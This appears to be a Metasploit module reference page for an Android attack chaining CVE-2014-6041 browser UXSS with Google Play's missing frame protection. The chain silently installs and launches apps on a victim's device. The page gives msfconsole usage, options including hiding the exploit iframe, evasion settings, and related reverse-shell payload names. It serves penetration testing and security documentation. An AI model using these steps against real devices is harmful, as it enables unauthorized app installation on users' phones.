Android Browser RCE Through Google Play Store XFO - Metasploit
This page contains detailed information about how to use the auxiliary/admin/android/google_play_store_uxss_xframe_rce metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Android Browser RCE Through Google Play Store XFO
Module: auxiliary/admin/android/google_play_store_uxss_xframe_rce
Source code: modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb
Disclosure date: -
Last modification time: 2020-05-12 22:15:21 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2014-6041
This module combines two vulnerabilities to achieve remote
code execution on affected Android devices. First, the
module exploits CVE-2014-6041, a Universal Cross-Site
Scripting (UXSS) vulnerability present in versions of
Android's open source stock browser (the AOSP Browser) prior
to 4.4. Second, the Google Play store's web interface fails
to enforce a X-Frame-Options: DENY header (XFO) on some
error pages, and therefore, can be targeted for script
injection. As a result, this leads to remote code execution
through Google Play's remote installation feature, as any
application available on the Google Play store can be
installed and launched on the user's device. This module
requires that the user is logged into Google with a
vulnerable browser. To list the activities in an APK, you
can use aapt dump badging /path/to/app.apk
.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
msf > use auxiliary/admin/android/google_play_store_uxss_xframe_rce
msf auxiliary(google_play_store_uxss_xframe_rce) > exploit
Go back to menu.
Msfconsole Usage
Here is how the admin/android/google_play_store_uxss_xframe_rce auxiliary module looks in the msfconsole:
msf6 > use auxiliary/admin/android/google_play_store_uxss_xframe_rce
msf6 auxiliary(admin/android/google_play_store_uxss_xframe_rce) > show info
Name: Android Browser RCE Through Google Play Store XFO
Module: auxiliary/admin/android/google_play_store_uxss_xframe_rce
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Rafay Baloch
joev <[email protected]>
Available actions:
Name Description
---- -----------
WebServer Serve exploit via web server
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
ACTIVITY_NAME com.swlkr.rickrolld/.RickRoll yes The name of the activity in the apk to launch
DETECT_LOGIN true yes Prevents the exploit from running if the user is not logged into Google
HIDE_IFRAME true yes Hide the exploit iframe from the user
PACKAGE_NAME com.swlkr.rickrolld yes The package name of the app on the Google Play store you want to install
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Description:
This module combines two vulnerabilities to achieve remote code
execution on affected Android devices. First, the module exploits
CVE-2014-6041, a Universal Cross-Site Scripting (UXSS) vulnerability
present in versions of Android's open source stock browser (the AOSP
Browser) prior to 4.4. Second, the Google Play store's web interface
fails to enforce a X-Frame-Options: DENY header (XFO) on some error
pages, and therefore, can be targeted for script injection. As a
result, this leads to remote code execution through Google Play's
remote installation feature, as any application available on the
Google Play store can be installed and launched on the user's
device. This module requires that the user is logged into Google
with a vulnerable browser. To list the activities in an APK, you can
use `aapt dump badging /path/to/app.apk`.
References:
https://blog.rapid7.com/2014/09/15/major-android-bug-is-a-privacy-disaster-cve-2014-6041
http://1337day.com/exploit/description/22581
OSVDB (110664)
https://nvd.nist.gov/vuln/detail/CVE-2014-6041
Module Options
This is a complete list of options available in the admin/android/google_play_store_uxss_xframe_rce auxiliary module:
msf6 auxiliary(admin/android/google_play_store_uxss_xframe_rce) > show options
Module options (auxiliary/admin/android/google_play_store_uxss_xframe_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
ACTIVITY_NAME com.swlkr.rickrolld/.RickRoll yes The name of the activity in the apk to launch
DETECT_LOGIN true yes Prevents the exploit from running if the user is not logged into Google
HIDE_IFRAME true yes Hide the exploit iframe from the user
PACKAGE_NAME com.swlkr.rickrolld yes The package name of the app on the Google Play store you want to install
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Auxiliary action:
Name Description
---- -----------
WebServer Serve exploit via web server
Advanced Options
Here is a complete list of advanced options supported by the admin/android/google_play_store_uxss_xframe_rce auxiliary module:
msf6 auxiliary(admin/android/google_play_store_uxss_xframe_rce) > show advanced
Module advanced options (auxiliary/admin/android/google_play_store_uxss_xframe_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
ListenerComm no The specific communication channel to use for this service
SSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
SSLCompression false no Enable SSL/TLS-level compression
SendRobots false no Return a robots.txt file if asked for one
URIHOST no Host to use in URI (useful for tunnels)
URIPORT no Port to use in URI (useful for tunnels)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the admin/android/google_play_store_uxss_xframe_rce module can do:
msf6 auxiliary(admin/android/google_play_store_uxss_xframe_rce) > show actions
Auxiliary actions:
Name Description
---- -----------
WebServer Serve exploit via web server
Evasion Options
Here is the full list of possible evasion options supported by the admin/android/google_play_store_uxss_xframe_rce auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(admin/android/google_play_store_uxss_xframe_rce) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
HTML::base64 none no Enable HTML obfuscation via an embeded base64 html object (IE not supported) (Accepted: none, plain, single_pad, double_pad, random_space_injection)
HTML::javascript::escape 0 no Enable HTML obfuscation via HTML escaping (number of iterations)
HTML::unicode none no Enable HTTP obfuscation via unicode (Accepted: none, utf-16le, utf-16be, utf-16be-marker, utf-32le, utf-32be)
HTTP::chunked false no Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
HTTP::compression none no Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
HTTP::header_folding false no Enable folding of HTTP headers
HTTP::junk_headers false no Enable insertion of random junk HTTP headers
HTTP::no_cache false no Disallow the browser to cache HTTP content
HTTP::server_name Apache yes Configures the Server header of all outgoing replies
TCP::max_send_size 0 no Maximum tcp segment size. (0 = disable)
TCP::send_delay 0 no Delays inserted before every send. (0 = disable)
Go back to menu.
Related Pull Requests
- #13443 Merged Pull Request: Add descriptions to auxiliary modules Actions
- #12949 Merged Pull Request: This fixes broken links to the community.rapid7.com blog
- #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #6812 Merged Pull Request: Resolve #6807, remove all OSVDB references.
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #6648 Merged Pull Request: Change metasploit class names
- #4742 Merged Pull Request: Module for R7-2015-02
References
- https://blog.rapid7.com/2014/09/15/major-android-bug-is-a-privacy-disaster-cve-2014-6041
- http://1337day.com/exploit/description/22581
- OSVDB (110664)
- CVE-2014-6041
See Also
Check also the following modules related to this module:
- auxiliary/gather/android_stock_browser_uxss
- exploit/unix/webapp/google_proxystylesheet_exec
- auxiliary/admin/http/wp_google_maps_sqli
- auxiliary/admin/http/netgear_r7000_backup_cgi_heap_overflow_rce
- auxiliary/admin/sap/cve_2020_6207_solman_rce
- exploit/unix/webapp/wp_google_document_embedder_exec
- auxiliary/dos/android/android_stock_browser_iframe
- exploit/android/adb/adb_server_exec
- exploit/android/browser/samsung_knox_smdm_url
- exploit/android/browser/stagefright_mp4_tx3g_64bit
- exploit/android/browser/webview_addjavascriptinterface
- exploit/android/fileformat/adobe_reader_pdf_js_interface
- exploit/android/local/binder_uaf
- exploit/android/local/futex_requeue
- exploit/android/local/janus
- exploit/android/local/put_user_vroot
- exploit/android/local/su_exec
- payload/android/meterpreter/reverse_http
- payload/android/meterpreter_reverse_http
- payload/android/meterpreter/reverse_https
- payload/android/meterpreter_reverse_https
- payload/android/meterpreter/reverse_tcp
- payload/android/meterpreter_reverse_tcp
- payload/android/shell/reverse_http
- payload/android/shell/reverse_https
- payload/android/shell/reverse_tcp
- post/android/capture/screen
- post/android/gather/hashdump
- post/android/gather/sub_info
- post/android/gather/wireless_ap
- post/android/local/koffee
- post/android/manage/remove_lock
- post/android/manage/remove_lock_root
Authors
- Rafay Baloch
- joev
Version
This page has been produced using Metasploit Framework version 6.1.28-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.